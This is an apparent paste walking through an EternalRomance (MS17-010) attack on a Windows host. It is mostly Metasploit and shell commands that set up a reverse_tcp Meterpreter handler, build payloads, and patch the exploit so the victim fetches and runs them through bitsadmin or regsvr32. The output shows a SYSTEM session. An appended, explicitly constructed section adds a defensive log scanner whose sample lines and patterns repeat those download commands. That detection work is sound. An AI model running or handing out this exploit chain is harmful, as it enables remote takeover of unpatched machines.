illwill

EternalRomance Python Example with ReverseTCP Meterpreter

Sep 30th, 2017
#1. - Test victim IP first to see if exploitable
msfconsole
use auxiliary/scanner/smb/pipe_auditor
set RHOSTS 192.168.128.19
exploit

#*choose any pipe name 'netlogon', 'spoolss', 'browser' etc...

######Exploiting the Victim##########
#2. - Setup Meterpreter Handler in console 1
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST $IP >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
msfconsole -r meterpreter.rc

or

IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfconsole -qx "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST '$IP';set ExitOnSession false;exploit -j -z"

#3. - Grab Exploit Scripts in console 2
wget https://www.exploit-db.com/download/42315 -O EternalRomance.py
wget https://github.com/worawit/MS17-010/raw/master/mysmb.py

#4a. - Payload Choice #1 - Create EXE payload using bitsadmin dl and execute
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP -f exe-service > /var/www/html/1.exe
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''cmd \/c bitsadmin \/transfer wcb \/priority high http:\/\/'$IP'\/1.exe C:\\1.exe \&\& C:\\1.exe'\'')/g' EternalRomance.py

#4b. - Payload Choice #2 - Create SCT payload with regsvr32 dl with scrobj.dll
git clone https://github.com/CroweCybersecurity/ps1encode .
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
echo $IP | ruby ps1encode.rb --PAYLOAD windows/meterpreter/reverse_tcp --LHOST='puts ARGF.read' --LPORT=4444 -t sct
chmod +x ./index.sct && mv ./index.sct /var/www/html/1.sct
sed -i -e "s/USERNAME = ''/USERNAME = 'GUEST'/g" -e 's/#service_exec(conn, r'\''cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt'\'')/service_exec(conn, r'\''regsvr32 \/s \/n \/u \/i:http:\/\/'$IP'\/1.sct scrobj.dll'\'')/g' EternalRomance.py

#5. - Start Webserver
service apache2 start


##################################
# Exploit that motherfucker (change the ip obviously)
python EternalRomance.py 192.168.128.19 netlogon


[*] Sending stage (957487 bytes) to 192.168.128.19
[*] Meterpreter session 1 opened (192.168.128.17:4444 -> 192.168.128.19:49176) at 2017-09-30 05:08:42 -0400
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
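Defender's view of the walkthrough above, as an added example that is not part of the original paste and not from the MS17-010 repository: both payload choices run through service_exec(), so on the victim they surface as a newly installed service whose binary path is a cmd.exe / bitsadmin / regsvr32 one-liner (System log event 7045, "a service was installed") and as a process creation (Security 4688 or Sysmon event 1) carrying the bitsadmin /transfer or regsvr32 /i:http ... scrobj.dll download. The script below scans log lines for exactly those command-line patterns. The log lines and their key=value field layout are constructed for this example (they are not a real exporter's format); event IDs 7045 and 4688 are the real Windows ones, and the attacker IP is the one from the paste's own session output.

```python
"""Flag host-side artefacts of the service_exec() payloads shown in the paste.

Constructed sample: one record per payload choice plus two benign records
(a normal Spooler service and a vendor regsvr32 /s of a local DLL).
"""
import re
from dataclasses import dataclass

# Constructed log lines in an assumed key=value layout (not a real product format).
SAMPLE_LOG = """\
2017-09-30T09:08:40Z host=WIN7-LAB event_id=7045 service_name=jQkXbV image_path="%COMSPEC% /c bitsadmin /transfer wcb /priority high http://192.168.128.17/1.exe C:\\1.exe && C:\\1.exe" account=LocalSystem
2017-09-30T09:08:41Z host=WIN7-LAB event_id=4688 new_process="C:\\Windows\\System32\\regsvr32.exe" command_line="regsvr32 /s /n /u /i:http://192.168.128.17/1.sct scrobj.dll" parent="C:\\Windows\\System32\\services.exe"
2017-09-30T09:10:02Z host=WIN7-LAB event_id=7045 service_name=Spooler image_path="C:\\Windows\\System32\\spoolsv.exe" account=LocalSystem
2017-09-30T09:11:15Z host=WIN7-LAB event_id=4688 new_process="C:\\Windows\\System32\\regsvr32.exe" command_line="regsvr32 /s C:\\Program Files\\Vendor\\vendor.dll" parent="C:\\Program Files\\Vendor\\setup.exe"
"""

# (rule name, event IDs the rule applies to, pattern run against the command text)
RULES = (
    ("bitsadmin /transfer download from a URL", {"7045", "4688"},
     re.compile(r"bitsadmin\s+/transfer\b.*https?://", re.I)),
    ("regsvr32 scriptlet fetch (scrobj.dll) from a URL", {"7045", "4688"},
     re.compile(r"regsvr32\b.*?/i:https?://.*scrobj\.dll", re.I)),
    ("service binary is a cmd.exe one-liner", {"7045"},
     re.compile(r"^(?:%COMSPEC%|cmd(?:\.exe)?)\s+/c\b", re.I)),
)

# key=value or key="quoted value" pairs; the timestamp is the first bare token
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Finding:
    ts: str
    host: str
    event_id: str
    rule: str
    command: str


def parse_line(line: str) -> dict:
    """Split one constructed log line into a field dict (ts, host, event_id, ...)."""
    rec = {"ts": line.split(None, 1)[0]}
    for key, quoted, bare in FIELD_RE.findall(line):
        rec[key] = quoted if quoted else bare
    return rec


def command_text(rec: dict) -> str:
    """The text a rule inspects: service image path for 7045, command line for 4688."""
    return rec.get("image_path") or rec.get("command_line") or ""


def scan(log_text: str) -> list:
    """Return one Finding per (record, matching rule); benign records yield none."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        cmd = command_text(rec)
        for name, event_ids, pattern in RULES:
            if rec.get("event_id") in event_ids and pattern.search(cmd):
                findings.append(Finding(rec["ts"], rec.get("host", "?"),
                                        rec["event_id"], name, cmd))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.host} evt={f.event_id} [{f.rule}] {f.command}")
```

On the sample the two payload records produce three findings (the bitsadmin service hits both the download rule and the cmd.exe-as-service rule) and the two benign records produce none; the third rule is the broad one and is what catches a service_exec() command even if the downloader changes.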